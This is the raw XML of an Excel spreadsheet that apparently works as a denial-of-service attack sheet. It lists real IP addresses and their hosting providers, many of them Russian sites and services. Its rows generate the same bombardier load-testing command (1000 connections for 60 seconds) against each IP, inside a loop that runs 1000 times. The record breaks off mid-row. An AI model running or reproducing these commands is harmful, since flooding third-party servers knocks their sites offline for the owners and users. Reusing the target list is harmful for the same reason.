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Вад\Desktop\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{A2ACB0EA-3B81-4051-B181-54CAFC9B344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xlnm._FilterDatabase" localSheetId="0" hidden="1">Sheet1!$A$2:$C$2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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="162" uniqueCount="112">
  <si>
    <t xml:space="preserve">for i in {1..1000}; do </t>
  </si>
  <si>
    <t>done</t>
  </si>
  <si>
    <t>62.122.170.171</t>
  </si>
  <si>
    <t>64.190.63.111</t>
  </si>
  <si>
    <t>nic.ru</t>
  </si>
  <si>
    <t>15.197.142.173</t>
  </si>
  <si>
    <t>reg.ru</t>
  </si>
  <si>
    <t>52.50.65.32</t>
  </si>
  <si>
    <t>amazonaws.com</t>
  </si>
  <si>
    <t>beget.com</t>
  </si>
  <si>
    <t>185.215.4.10</t>
  </si>
  <si>
    <t>89.111.167.3</t>
  </si>
  <si>
    <t>31.31.205.163</t>
  </si>
  <si>
    <t>75.2.111.214</t>
  </si>
  <si>
    <t>serverel.net</t>
  </si>
  <si>
    <t>34.102.136.180</t>
  </si>
  <si>
    <t>googleusercontent.com</t>
  </si>
  <si>
    <t>awsglobalaccelerator.com</t>
  </si>
  <si>
    <t>timeweb.ru</t>
  </si>
  <si>
    <t>ddos-guard.net</t>
  </si>
  <si>
    <t>masterhost.ru</t>
  </si>
  <si>
    <t>r01.ru</t>
  </si>
  <si>
    <t>regruhosting.ru</t>
  </si>
  <si>
    <t>77.88.21.249</t>
  </si>
  <si>
    <t>yandex.net</t>
  </si>
  <si>
    <t>cloudflare.com</t>
  </si>
  <si>
    <t>173.255.194.134</t>
  </si>
  <si>
    <t>linode.com</t>
  </si>
  <si>
    <t>jino.ru</t>
  </si>
  <si>
    <t>rax.ru</t>
  </si>
  <si>
    <t>31.177.76.70</t>
  </si>
  <si>
    <t>95.131.27.119</t>
  </si>
  <si>
    <t>92.53.96.180</t>
  </si>
  <si>
    <t>172.67.3.106</t>
  </si>
  <si>
    <t>108.162.193.71</t>
  </si>
  <si>
    <t>108.162.192.67</t>
  </si>
  <si>
    <t>104.21.24.94</t>
  </si>
  <si>
    <t>104.20.73.219</t>
  </si>
  <si>
    <t>31.31.198.173</t>
  </si>
  <si>
    <t>186.2.163.192</t>
  </si>
  <si>
    <t>186.2.163.116</t>
  </si>
  <si>
    <t>185.108.84.25</t>
  </si>
  <si>
    <t>domenforum.net</t>
  </si>
  <si>
    <t>85.10.199.73</t>
  </si>
  <si>
    <t>clients.your-server.de</t>
  </si>
  <si>
    <t>80.78.255.201</t>
  </si>
  <si>
    <t>77.94.250.170</t>
  </si>
  <si>
    <t>45.58.43.217</t>
  </si>
  <si>
    <t>37.187.209.6</t>
  </si>
  <si>
    <t>dns-dc.net</t>
  </si>
  <si>
    <t>31.31.198.210</t>
  </si>
  <si>
    <t>212.109.222.156</t>
  </si>
  <si>
    <t>yutex.ru</t>
  </si>
  <si>
    <t>195.20.48.32</t>
  </si>
  <si>
    <t>185.250.205.146</t>
  </si>
  <si>
    <t>had.wf</t>
  </si>
  <si>
    <t>185.201.55.135</t>
  </si>
  <si>
    <t>185.201.55.130</t>
  </si>
  <si>
    <t>ns2.pravda.ru</t>
  </si>
  <si>
    <t>185.201.54.62</t>
  </si>
  <si>
    <t>185.201.54.61</t>
  </si>
  <si>
    <t>185.201.54.54</t>
  </si>
  <si>
    <t>185.84.110.84</t>
  </si>
  <si>
    <t>185.9.147.200</t>
  </si>
  <si>
    <t>smartape.ru</t>
  </si>
  <si>
    <t>172.66.42.251</t>
  </si>
  <si>
    <t>172.66.41.5</t>
  </si>
  <si>
    <t>172.64.174.9</t>
  </si>
  <si>
    <t>172.64.34.202</t>
  </si>
  <si>
    <t>166.88.19.180</t>
  </si>
  <si>
    <t>108.162.195.58</t>
  </si>
  <si>
    <t>104.22.9.224</t>
  </si>
  <si>
    <t>104.21.64.245</t>
  </si>
  <si>
    <t>104.21.62.168</t>
  </si>
  <si>
    <t>104.21.56.16</t>
  </si>
  <si>
    <t>92.53.96.174</t>
  </si>
  <si>
    <t>91.236.24.90</t>
  </si>
  <si>
    <t>91.236.24.84</t>
  </si>
  <si>
    <t>91.189.114.7</t>
  </si>
  <si>
    <t>90.156.201.106</t>
  </si>
  <si>
    <t>89.31.143.1</t>
  </si>
  <si>
    <t>udag.de</t>
  </si>
  <si>
    <t>88.212.196.71</t>
  </si>
  <si>
    <t>85.92.118.227</t>
  </si>
  <si>
    <t>81.177.141.213</t>
  </si>
  <si>
    <t>77.93.220.68</t>
  </si>
  <si>
    <t>anafra.net</t>
  </si>
  <si>
    <t>77.73.232.159</t>
  </si>
  <si>
    <t>75.2.18.233</t>
  </si>
  <si>
    <t>62.109.15.100</t>
  </si>
  <si>
    <t>da.ru</t>
  </si>
  <si>
    <t>47.240.33.35</t>
  </si>
  <si>
    <t>37.140.192.170</t>
  </si>
  <si>
    <t>31.31.196.208</t>
  </si>
  <si>
    <t>5.183.188.59</t>
  </si>
  <si>
    <t>195.208.1.119</t>
  </si>
  <si>
    <t>195.20.52.17</t>
  </si>
  <si>
    <t>188.214.128.77</t>
  </si>
  <si>
    <t>customhost.com</t>
  </si>
  <si>
    <t>185.165.123.36</t>
  </si>
  <si>
    <t>185.53.177.12</t>
  </si>
  <si>
    <t>104.21.32.223</t>
  </si>
  <si>
    <t>104.21.17.144</t>
  </si>
  <si>
    <t>95.216.245.81</t>
  </si>
  <si>
    <t>na.ru</t>
  </si>
  <si>
    <t>91.217.21.1</t>
  </si>
  <si>
    <t>90.156.201.107</t>
  </si>
  <si>
    <t>87.236.16.70</t>
  </si>
  <si>
    <t>77.73.24.205</t>
  </si>
  <si>
    <t>gptel.ru</t>
  </si>
  <si>
    <t>31.28.24.244</t>
  </si>
  <si>
    <t>23.111.114.10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</si>
</sst>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0000000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563"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0">
      <selection activeCell="A2" sqref="A2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11.25" defaultRowHeight="15.75" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="76.875" customWidth="1"/>
    <col min="2" max="2" width="14.75" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="45.25" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="2" spans="1:3" ht="15" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A2" s="1" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A3" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B3&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.67.3.106&amp;&amp; sleep 5;</v>
      </c>
      <c r="B3" s="1" t="s">
        <v>33</v>
      </c>
      <c r="C3" s="1" t="s">
        <v>33</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A4" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B4&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.162.193.71&amp;&amp; sleep 5;</v>
      </c>
      <c r="B4" s="1" t="s">
        <v>34</v>
      </c>
      <c r="C4" s="1" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A5" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B5&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.162.192.67&amp;&amp; sleep 5;</v>
      </c>
      <c r="B5" s="1" t="s">
        <v>35</v>
      </c>
      <c r="C5" s="1" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A6" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B6&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.24.94&amp;&amp; sleep 5;</v>
      </c>
      <c r="B6" s="1" t="s">
        <v>36</v>
      </c>
      <c r="C6" s="1" t="s">
        <v>36</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A7" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B7&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.20.73.219&amp;&amp; sleep 5;</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>37</v>
      </c>
      <c r="C7" s="1" t="s">
        <v>37</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A8" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B8&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 95.131.27.119&amp;&amp; sleep 5;</v>
      </c>
      <c r="B8" s="1" t="s">
        <v>31</v>
      </c>
      <c r="C8" s="1" t="s">
        <v>31</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A9" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B9&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 64.190.63.111&amp;&amp; sleep 5;</v>
      </c>
      <c r="B9" s="1" t="s">
        <v>3</v>
      </c>
      <c r="C9" s="1" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A10" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B10&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 62.122.170.171&amp;&amp; sleep 5;</v>
      </c>
      <c r="B10" s="1" t="s">
        <v>2</v>
      </c>
      <c r="C10" s="1" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A11" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B11&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.198.173&amp;&amp; sleep 5;</v>
      </c>
      <c r="B11" s="1" t="s">
        <v>38</v>
      </c>
      <c r="C11" s="1" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A12" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B12&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 186.2.163.192&amp;&amp; sleep 5;</v>
      </c>
      <c r="B12" s="1" t="s">
        <v>39</v>
      </c>
      <c r="C12" s="1" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A13" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B13&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 186.2.163.116&amp;&amp; sleep 5;</v>
      </c>
      <c r="B13" s="1" t="s">
        <v>40</v>
      </c>
      <c r="C13" s="1" t="s">
        <v>19</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A14" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B14&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.108.84.25&amp;&amp; sleep 5;</v>
      </c>
      <c r="B14" s="1" t="s">
        <v>41</v>
      </c>
      <c r="C14" s="1" t="s">
        <v>42</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A15" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B15&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 85.10.199.73&amp;&amp; sleep 5;</v>
      </c>
      <c r="B15" s="1" t="s">
        <v>43</v>
      </c>
      <c r="C15" s="1" t="s">
        <v>44</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A16" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B16&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 80.78.255.201&amp;&amp; sleep 5;</v>
      </c>
      <c r="B16" s="1" t="s">
        <v>45</v>
      </c>
      <c r="C16" s="1" t="s">
        <v>22</v>
      </c>
    </row>
    <row r="17" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A17" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B17&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.94.250.170&amp;&amp; sleep 5;</v>
      </c>
      <c r="B17" s="1" t="s">
        <v>46</v>
      </c>
      <c r="C17" s="1" t="s">
        <v>46</v>
      </c>
    </row>
    <row r="18" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A18" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B18&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.88.21.249&amp;&amp; sleep 5;</v>
      </c>
      <c r="B18" s="1" t="s">
        <v>23</v>
      </c>
      <c r="C18" s="1" t="s">
        <v>24</v>
      </c>
    </row>
    <row r="19" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A19" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B19&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 45.58.43.217&amp;&amp; sleep 5;</v>
      </c>
      <c r="B19" s="1" t="s">
        <v>47</v>
      </c>
      <c r="C19" s="1" t="s">
        <v>47</v>
      </c>
    </row>
    <row r="20" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A20" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B20&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 37.187.209.6&amp;&amp; sleep 5;</v>
      </c>
      <c r="B20" s="1" t="s">
        <v>48</v>
      </c>
      <c r="C20" s="1" t="s">
        <v>49</v>
      </c>
    </row>
    <row r="21" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A21" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B21&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.31.198.210&amp;&amp; sleep 5;</v>
      </c>
      <c r="B21" s="1" t="s">
        <v>50</v>
      </c>
      <c r="C21" s="1" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="22" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A22" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B22&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.109.222.156&amp;&amp; sleep 5;</v>
      </c>
      <c r="B22" s="1" t="s">
        <v>51</v>
      </c>
      <c r="C22" s="1" t="s">
        <v>52</v>
      </c>
    </row>
    <row r="23" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A23" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B23&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.20.48.32&amp;&amp; sleep 5;</v>
      </c>
      <c r="B23" s="1" t="s">
        <v>53</v>
      </c>
      <c r="C23" s="1" t="s">
        <v>53</v>
      </c>
    </row>
    <row r="24" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A24" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B24&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.250.205.146&amp;&amp; sleep 5;</v>
      </c>
      <c r="B24" s="1" t="s">
        <v>54</v>
      </c>
      <c r="C24" s="1" t="s">
        <v>55</v>
      </c>
    </row>
    <row r="25" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A25" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B25&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.201.55.135&amp;&amp; sleep 5;</v>
      </c>
      <c r="B25" s="1" t="s">
        <v>56</v>
      </c>
      <c r="C25" s="1" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="26" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A26" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B26&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.201.55.130&amp;&amp; sleep 5;</v>
      </c>
      <c r="B26" s="1" t="s">
        <v>57</v>
      </c>
      <c r="C26" s="1" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="27" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A27" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B27&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.201.54.62&amp;&amp; sleep 5;</v>
      </c>
      <c r="B27" s="1" t="s">
        <v>59</v>
      </c>
      <c r="C27" s="1" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="28" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A28" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B28&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.201.54.61&amp;&amp; sleep 5;</v>
      </c>
      <c r="B28" s="1" t="s">
        <v>60</v>
      </c>
      <c r="C28" s="1" t="s">
        <v>60</v>
      </c>
    </row>
    <row r="29" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A29" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B29&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.201.54.54&amp;&amp; sleep 5;</v>
      </c>
      <c r="B29" s="1" t="s">
        <v>61</v>
      </c>
      <c r="C29" s="1" t="s">
        <v>61</v>
      </c>
    </row>
    <row r="30" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A30" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B30&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.84.110.84&amp;&amp; sleep 5;</v>
      </c>
      <c r="B30" s="1" t="s">
        <v>62</v>
      </c>
      <c r="C30" s="1" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="31" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A31" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B31&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.9.147.200&amp;&amp; sleep 5;</v>
      </c>
      <c r="B31" s="1" t="s">
        <v>63</v>
      </c>
      <c r="C31" s="1" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="32" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A32" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B32&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 173.255.194.134&amp;&amp; sleep 5;</v>
      </c>
      <c r="B32" s="1" t="s">
        <v>26</v>
      </c>
      <c r="C32" s="1" t="s">
        <v>27</v>
      </c>
    </row>
    <row r="33" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A33" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B33&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.66.42.251&amp;&amp; sleep 5;</v>
      </c>
      <c r="B33" s="1" t="s">
        <v>65</v>
      </c>
      <c r="C33" s="1" t="s">
        <v>65</v>
      </c>
    </row>
    <row r="34" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A34" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B34&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.66.41.5&amp;&amp; sleep 5;</v>
      </c>
      <c r="B34" s="1" t="s">
        <v>66</v>
      </c>
      <c r="C34" s="1" t="s">
        <v>66</v>
      </c>
    </row>
    <row r="35" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A35" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B35&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.64.174.9&amp;&amp; sleep 5;</v>
      </c>
      <c r="B35" s="1" t="s">
        <v>67</v>
      </c>
      <c r="C35" s="1" t="s">
        <v>67</v>
      </c>
    </row>
    <row r="36" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A36" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B36&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 172.64.34.202&amp;&amp; sleep 5;</v>
      </c>
      <c r="B36" s="1" t="s">
        <v>68</v>
      </c>
      <c r="C36" s="1" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="37" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A37" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B37&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 166.88.19.180&amp;&amp; sleep 5;</v>
      </c>
      <c r="B37" s="1" t="s">
        <v>69</v>
      </c>
      <c r="C37" s="1" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="38" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A38" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B38&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 108.162.195.58&amp;&amp; sleep 5;</v>
      </c>
      <c r="B38" s="1" t="s">
        <v>70</v>
      </c>
      <c r="C38" s="1" t="s">
        <v>25</v>
      </c>
    </row>
    <row r="39" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A39" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B39&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.22.9.224&amp;&amp; sleep 5;</v>
      </c>
      <c r="B39" s="1" t="s">
        <v>71</v>
      </c>
      <c r="C39" s="1" t="s">
        <v>71</v>
      </c>
    </row>
    <row r="40" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A40" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B40&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.64.245&amp;&amp; sleep 5;</v>
      </c>
      <c r="B40" s="1" t="s">
        <v>72</v>
      </c>
      <c r="C40" s="1" t="s">
        <v>72</v>
      </c>
    </row>
    <row r="41" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A41" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B41&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.62.168&amp;&amp; sleep 5;</v>
      </c>
      <c r="B41" s="1" t="s">
        <v>73</v>
      </c>
      <c r="C41" s="1" t="s">
        <v>73</v>
      </c>
    </row>
    <row r="42" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A42" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B42&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 104.21.56.16&amp;&amp; sleep 5;</v>
      </c>
      <c r="B42" s="1" t="s">
        <v>74</v>
      </c>
      <c r="C42" s="1" t="s">
        <v>74</v>
      </c>
    </row>
    <row r="43" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A43" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B43&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.53.96.180&amp;&amp; sleep 5;</v>
      </c>
      <c r="B43" s="1" t="s">
        <v>32</v>
      </c>
      <c r="C43" s="1" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="44" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A44" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B44&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.53.96.174&amp;&amp; sleep 5;</v>
      </c>
      <c r="B44" s="1" t="s">
        <v>75</v>
      </c>
      <c r="C44" s="1" t="s">
        <v>18</v>
      </c>
    </row>
    <row r="45" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A45" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B45&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.236.24.90&amp;&amp; sleep 5;</v>
      </c>
      <c r="B45" s="1" t="s">
        <v>76</v>
      </c>
      <c r="C45" s="1" t="s">
        <v>76</v>
      </c>
    </row>
    <row r="46" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A46" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B46&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.236.24.84&amp;&amp; sleep 5;</v>
      </c>
      <c r="B46" s="1" t="s">
        <v>77</v>
      </c>
      <c r="C46" s="1" t="s">
        <v>77</v>
      </c>
    </row>
    <row r="47" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A47" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B47&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.189.114.7&amp;&amp; sleep 5;</v>
      </c>
      <c r="B47" s="1" t="s">
        <v>78</v>
      </c>
      <c r="C47" s="1" t="s">
        <v>4</v>
      </c>
    </row>
    <row r="48" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A48" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B48&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.156.201.106&amp;&amp; sleep 5;</v>
      </c>
      <c r="B48" s="1" t="s">
        <v>79</v>
      </c>
      <c r="C48" s="1" t="s">
        <v>20</v>
      </c>
    </row>
    <row r="49" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A49" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B49&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.111.167.3&amp;&amp; sleep 5;</v>
      </c>
      <c r="B49" s="1" t="s">
        <v>11</v>
      </c>
      <c r="C49" s="1" t="s">
        <v>21</v>
      </c>
    </row>
    <row r="50" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A50" s="1" t="str">
        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B50&amp;"&amp;&amp; sleep 5;"</f>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.31.143.1&amp;&amp; sleep 5;</v>
      </c>
      <c r="B50" s="1" t="s">
        <v>80</v>
      </c>
      <c r="C50" s="1" t="s">
        <v>81</v>
      </c>
    </row>
    <row r="51" spans="1:3" x14ac:dyDescent="0.25">
